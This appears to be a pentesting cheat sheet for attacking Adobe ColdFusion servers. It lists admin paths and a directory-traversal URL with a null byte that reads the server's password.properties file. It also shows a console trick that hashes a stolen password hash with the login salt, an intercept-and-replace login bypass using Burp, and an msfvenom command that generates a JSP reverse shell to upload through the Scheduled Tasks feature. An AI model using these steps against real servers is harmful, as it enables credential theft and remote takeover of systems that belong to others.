coldfusion
Interesting Paths
# identification folders
/CFIDE
/cfdocs
# admin page
/CFIDE/administrator/index.cfmAdmin Page bypass
IP/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Using console > console.log(hex_hmac_sha1(document.loginform.salt.value, '<hash>'));
Using Burp to intercept and using `<console-hash>` as new password.Upload Shell using GUI
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -o shell.jsp
Under Debugging & Logging > Scheduled Tasks > Create new taskArbitary File Upload (unauthenticated)
Last updated